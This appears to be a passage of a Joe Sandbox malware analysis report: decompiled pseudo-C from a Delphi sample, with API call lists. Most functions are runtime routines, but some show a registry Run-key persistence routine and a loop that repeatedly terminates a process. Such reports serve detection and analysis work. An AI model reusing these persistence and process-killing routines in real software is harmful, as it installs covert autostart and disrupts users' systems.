    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep(0x4e20);
    				goto L2;
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep(0x4e20);
    				}
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
